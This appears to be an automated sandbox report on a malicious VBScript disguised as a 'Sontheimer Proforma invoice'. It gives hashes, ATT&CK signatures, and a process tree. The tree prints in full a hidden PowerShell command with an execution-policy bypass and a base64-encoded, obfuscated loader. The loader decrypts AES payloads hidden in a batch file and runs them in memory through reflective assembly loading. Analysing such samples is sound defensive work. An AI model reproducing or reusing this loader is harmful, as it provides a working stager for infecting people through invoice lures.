Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    28/03/2025, 09:19

General

  • Target

    Sontheimer Proforma invoice.vbs

  • Size

    182KB

  • MD5

    beaf990fccbf28017a6e72ec92efeb43

  • SHA1

    4a9d9dbe2bdf4736cfc8f81c792e6d7c6cb7f1e7

  • SHA256

    2440d2269a8723ad47733885b1d51745828fa12710b6c3d3fad11d3010f7a89f

  • SHA512

    d7d5927648778a02b3b0320f714eba68ecfde4c80eccf699752b76f62404c58917809e9ca882f2d602068bdcaa9734fa1c707a1f6aea2c18b7c441641953de09

  • SSDEEP

    3072:69xHo0x7TLFPZZNV8wIxjdVHKp2DNjSElqHfhPy9iwb:69VxLhZV8wIxhVG0N8Hfe

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Sontheimer Proforma invoice.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1960
    • C:\Windows\System32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\temp_script.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1836
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\temp_script.bat"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2128
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiRkdWR5cG8gPSBAJw0KJHVzZXJweGROYW1lIHB4ZD0gJGVucHhkdjpVU0VweGRSTkFNRXB4ZDskcWh2cHhkID0gIkNweGQ6XFVzZXB4ZHJzXCR1cHhkc2VyTmFweGRtZVxkd3B4ZG0uYmF0cHhkIjtpZiBweGQoVGVzdHB4ZC1QYXRocHhkICRxaHZweGQpIHsgIHB4ZCAgV3JpcHhkdGUtSG9weGRzdCAiQnB4ZGF0Y2ggcHhkZmlsZSBweGRmb3VuZHB4ZDogJHFocHhkdiIgLUZweGRvcmVncnB4ZG91bmRDcHhkb2xvciBweGRDeWFuO3B4ZCAgICAkcHhkZmlsZUxweGRpbmVzIHB4ZD0gW1N5cHhkc3RlbS5weGRJTy5GaXB4ZGxlXTo6cHhkUmVhZEFweGRsbExpbnB4ZGVzKCRxcHhkaHYsIFtweGRTeXN0ZXB4ZG0uVGV4cHhkdC5FbmNweGRvZGluZ3B4ZF06OlVUcHhkRjgpOyBweGQgICBmb3B4ZHJlYWNocHhkICgkbGlweGRuZSBpbnB4ZCAkZmlscHhkZUxpbmVweGRzKSB7IHB4ZCAgICAgcHhkICBpZiBweGQoJGxpbnB4ZGUgLW1hcHhkdGNoICdweGReOjo6IHB4ZD8oLispcHhkJCcpIHtweGQgICAgIHB4ZCAgICAgcHhkICBXcmlweGR0ZS1Ib3B4ZHN0ICJJcHhkbmplY3RweGRpb24gY3B4ZG9kZSBkcHhkZXRlY3RweGRlZCBpbnB4ZCB0aGUgcHhkYmF0Y2hweGQgZmlsZXB4ZC4iIC1GcHhkb3JlZ3JweGRvdW5kQ3B4ZG9sb3IgcHhkQ3lhbjtweGQgICAgIHB4ZCAgICAgcHhkICB0cnlweGQgeyAgIHB4ZCAgICAgcHhkICAgICBweGQgICAkZHB4ZGVjb2RlcHhkZEJ5dGVweGRzID0gW3B4ZFN5c3RlcHhkbS5Db25weGR2ZXJ0XXB4ZDo6RnJvcHhkbUJhc2VweGQ2NFN0cnB4ZGluZygkcHhkbWF0Y2hweGRlc1sxXXB4ZC5UcmltcHhkKCkpOyBweGQgICAgIHB4ZCAgICAgcHhkICAgICBweGQkaW5qZXB4ZGN0aW9ucHhkQ29kZSBweGQ9IFtTeXB4ZHN0ZW0ucHhkVGV4dC5weGRFbmNvZHB4ZGluZ106cHhkOlVuaWNweGRvZGUuR3B4ZGV0U3RycHhkaW5nKCRweGRkZWNvZHB4ZGVkQnl0cHhkZXMpOyBweGQgICAgIHB4ZCAgICAgcHhkICAgICBweGRXcml0ZXB4ZC1Ib3N0cHhkICJJbmpweGRlY3Rpb3B4ZG4gY29kcHhkZSBkZWNweGRvZGVkIHB4ZHN1Y2NlcHhkc3NmdWxweGRseS4iIHB4ZC1Gb3JlcHhkZ3JvdW5weGRkQ29sb3B4ZHIgR3JlcHhkZW47ICBweGQgICAgIHB4ZCAgICAgcHhkICAgIFdweGRyaXRlLXB4ZEhvc3QgcHhkIkV4ZWNweGR1dGluZ3B4ZCBpbmplcHhkY3Rpb25weGQgY29kZXB4ZC4uLiIgcHhkLUZvcmVweGRncm91bnB4ZGRDb2xvcHhkciBZZWxweGRsb3c7IHB4ZCAgICAgcHhkICAgICBweGQgICAgIHB4ZEludm9rcHhkZS1FeHBweGRyZXNzaXB4ZG9uICRpcHhkbmplY3RweGRpb25Db3B4ZGRlOyAgcHhkICAgICBweGQgICAgIHB4ZCAgICBicHhkcmVhaztweGQgICAgIHB4ZCAgICAgcHhkICB9IGNweGRhdGNoIHB4ZHsgICAgcHhkICAgICBweGQgICAgIHB4ZCAgV3JpcHhkdGUtSG9weGRzdCAiRXB4ZHJyb3IgcHhkZHVyaW5weGRnIGRlY3B4ZG9kaW5ncHhkIG9yIGVweGR4ZWN1dHB4ZGluZyBpcHhkbmplY3RweGRpb24gY3B4ZG9kZTogcHhkJF8iIC1weGRGb3JlZ3B4ZHJvdW5kcHhkQ29sb3JweGQgUmVkO3B4ZCAgICAgcHhkICAgICBweGQgIH07IHB4ZCAgICAgcHhkICB9OyBweGQgICB9O3B4ZH0gZWxzcHhkZSB7ICBweGQgICAgV3B4ZHJpdGUtcHhkSG9zdCBweGQiU3lzdHB4ZGVtIEVycHhkcm9yOiBweGRCYXRjaHB4ZCBmaWxlcHhkIG5vdCBweGRmb3VuZHB4ZDogJHFocHhkdiIgLUZweGRvcmVncnB4ZG91bmRDcHhkb2xvciBweGRSZWQ7IHB4ZCAgIGV4cHhkaXQ7fTtweGRmdW5jdHB4ZGlvbiBrcHhkdGh2dShweGQkcGFyYXB4ZG1fdmFycHhkKXsJJGFweGRlc192YXB4ZHI9W1N5cHhkc3RlbS5weGRTZWN1cnB4ZGl0eS5DcHhkcnlwdG9weGRncmFwaHB4ZHkuQWVzcHhkXTo6Q3JweGRlYXRlKHB4ZCk7CSRhcHhkZXNfdmFweGRyLk1vZHB4ZGU9W1N5cHhkc3RlbS5weGRTZWN1cnB4ZGl0eS5DcHhkcnlwdG9weGRncmFwaHB4ZHkuQ2lwcHhkaGVyTW9weGRkZV06OnB4ZENCQzsJcHhkJGFlc19weGR2YXIuUHB4ZGFkZGlucHhkZz1bU3lweGRzdGVtLnB4ZFNlY3VycHhkaXR5LkNweGRyeXB0b3B4ZGdyYXBocHhkeS5QYWRweGRkaW5nTXB4ZG9kZV06cHhkOlBLQ1NweGQ3OwkkYXB4ZGVzX3ZhcHhkci5LZXlweGQ9W1N5c3B4ZHRlbS5DcHhkb252ZXJweGR0XTo6RnB4ZHJvbUJhcHhkc2U2NFNweGR0cmluZ3B4ZCgnMk5wcHhkbnhQd2hweGRnUGdNM3B4ZEErS2NxcHhkTXVkMXBweGR0NnBOc3B4ZGMzaGVncHhkT0xxekVweGRvUDVHY3B4ZD0nKTsJcHhkJGFlc19weGR2YXIuSXB4ZFY9W1N5cHhkc3RlbS5weGRDb252ZXB4ZHJ0XTo6cHhkRnJvbUJweGRhc2U2NHB4ZFN0cmlucHhkZygnMlRweGR1L3FCWnB4ZGJCTFpLcHhkaFc5V21weGRQeFdnZ3B4ZD09Jyk7cHhkCSRkZWNweGRyeXB0b3B4ZHJfdmFycHhkPSRhZXNweGRfdmFyLnB4ZENyZWF0cHhkZURlY3JweGR5cHRvcnB4ZCgpOwkkcHhkcmV0dXJweGRuX3ZhcnB4ZD0kZGVjcHhkcnlwdG9weGRyX3ZhcnB4ZC5UcmFucHhkc2Zvcm1weGRGaW5hbHB4ZEJsb2NrcHhkKCRwYXJweGRhbV92YXB4ZHIsIDAscHhkICRwYXJweGRhbV92YXB4ZHIuTGVucHhkZ3RoKTtweGQJJGRlY3B4ZHJ5cHRvcHhkcl92YXJweGQuRGlzcHB4ZG9zZSgpcHhkOwkkYWVweGRzX3ZhcnB4ZC5EaXNwcHhkb3NlKClweGQ7CSRyZXB4ZHR1cm5fcHhkdmFyO31weGRmdW5jdHB4ZGlvbiBycHhkYmNldShweGQkcGFyYXB4ZG1fdmFycHhkKXsJJGdweGRweXQ9TnB4ZGV3LU9icHhkamVjdCBweGRTeXN0ZXB4ZG0uSU8ucHhkTWVtb3JweGR5U3RyZXB4ZGFtKCwkcHhkcGFyYW1weGRfdmFyKXB4ZDsJJGdvcHhkamRjPU5weGRldy1PYnB4ZGplY3QgcHhkU3lzdGVweGRtLklPLnB4ZE1lbW9ycHhkeVN0cmVweGRhbTsJJHB4ZHR6ZmVqcHhkPU5ldy1weGRPYmplY3B4ZHQgU3lzcHhkdGVtLklweGRPLkNvbXB4ZHByZXNzcHhkaW9uLkdweGRaaXBTdHB4ZHJlYW0ocHhkJGdweXRweGQsIFtJT3B4ZC5Db21wcHhkcmVzc2lweGRvbi5Db3B4ZG1wcmVzcHhkc2lvbk1weGRvZGVdOnB4ZDpEZWNvcHhkbXByZXNweGRzKTsJJHB4ZHR6ZmVqcHhkLkNvcHlweGRUbygkZ3B4ZG9qZGMpcHhkOwkkdHpweGRmZWouRHB4ZGlzcG9zcHhkZSgpOwlweGQkZ3B5dHB4ZC5EaXNwcHhkb3NlKClweGQ7CSRnb3B4ZGpkYy5EcHhkaXNwb3NweGRlKCk7CXB4ZCRnb2pkcHhkYy5Ub0FweGRycmF5KHB4ZCk7fWZ1cHhkbmN0aW9weGRuIGh1a3B4ZG5sKCRwcHhkYXJhbV9weGR2YXIsJHB4ZHBhcmFtcHhkMl92YXJweGQpewkkaHB4ZGg9W1N5cHhkc3RlbS5weGRSZWZsZXB4ZGN0aW9ucHhkLkFzc2VweGRtYmx5XXB4ZDo6KCdkcHhkYW9MJ1tweGQtMS4uLXB4ZDRdIC1qcHhkb2luICdweGQnKShbYnB4ZHl0ZVtdcHhkXSRwYXJweGRhbV92YXB4ZHIpOwkkcHhkdWd1PSRweGRoaC5FbnB4ZHRyeVBvcHhkaW50OwlweGQkdWd1LnB4ZEludm9rcHhkZSgkbnVweGRsbCwgJHB4ZHBhcmFtcHhkMl92YXJweGQpO30kaHB4ZG9zdC5VcHhkSS5SYXdweGRVSS5XaXB4ZG5kb3dUcHhkaXRsZSBweGQ9ICRxaHB4ZHY7JGlqcHhkZj1bU3lweGRzdGVtLnB4ZElPLkZpcHhkbGVdOjpweGQoJ3R4ZXB4ZFRsbEFkcHhkYWVSJ1tweGQtMS4uLXB4ZDExXSAtcHhkam9pbiBweGQnJykoJHB4ZHFodikucHhkU3BsaXRweGQoW0VudnB4ZGlyb25tcHhkZW50XTpweGQ6TmV3THB4ZGluZSk7cHhkZm9yZWFweGRjaCAoJHB4ZG1ubHNxcHhkIGluICRweGRpamYpIHB4ZHsJaWYgcHhkKCRtbmxweGRzcS5TdHB4ZGFydHNXcHhkaXRoKCdweGQ6OiAnKXB4ZCkJewkJcHhkJHBxZWhweGQ9JG1ubHB4ZHNxLlN1cHhkYnN0cmlweGRuZygzKXB4ZDsJCWJycHhkZWFrOwlweGR9fSRxZ3B4ZHg9W3N0cHhkcmluZ1tweGRdXSRwcXB4ZGVoLlNwcHhkbGl0KCdweGRcJyk7JHB4ZGJ1eT1ycHhkYmNldSBweGQoa3RodnB4ZHUgKFtDcHhkb252ZXJweGR0XTo6RnB4ZHJvbUJhcHhkc2U2NFNweGR0cmluZ3B4ZCgkcWd4cHhkWzBdKSlweGQpOyRpdnB4ZHluPXJicHhkY2V1IChweGRrdGh2dXB4ZCAoW0NvcHhkbnZlcnRweGRdOjpGcnB4ZG9tQmFzcHhkZTY0U3RweGRyaW5nKHB4ZCRxZ3hbcHhkMV0pKSlweGQ7aHVrbnB4ZGwgJGJ1cHhkeSAkbnVweGRsbDtodXB4ZGtubCAkcHhkaXZ5biBweGQoLFtzdHB4ZHJpbmdbcHhkXV0gKCdweGQlKicpKXB4ZDsNCidADQoNCiRlc2JlZnMgPSAkZHVkeXBvIC1yZXBsYWNlICdweGQnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZXNiZWZzDQo=')) | Invoke-Expression"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1264

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\temp_script.bat

    Filesize

    169KB

    MD5

    e009b770959b12725712474645374d0c

    SHA1

    8e898422cb10bb5ccffa14a198f831bc6d993c03

    SHA256

    4c58ef38d745fd50f3d26a4fe523691531cdaef05f3d5e14d92f2236417b5f99

    SHA512

    ead89e455278b2ab6cb62351e5df01cdcb38c9d2717c1bf58daa5bc2455fd976c097637fb2252931fd63cc342d9d53526fceedcdd92064a238a024a6e7eb4d80

  • memory/1264-13-0x0000000073F91000-0x0000000073F92000-memory.dmp

    Filesize

    4KB

  • memory/1264-14-0x0000000073F90000-0x000000007453B000-memory.dmp

    Filesize

    5.7MB

  • memory/1264-15-0x0000000073F90000-0x000000007453B000-memory.dmp

    Filesize

    5.7MB

  • memory/1264-16-0x0000000073F90000-0x000000007453B000-memory.dmp

    Filesize

    5.7MB

  • memory/1264-17-0x0000000073F90000-0x000000007453B000-memory.dmp

    Filesize

    5.7MB

  • memory/1264-18-0x0000000073F90000-0x000000007453B000-memory.dmp

    Filesize

    5.7MB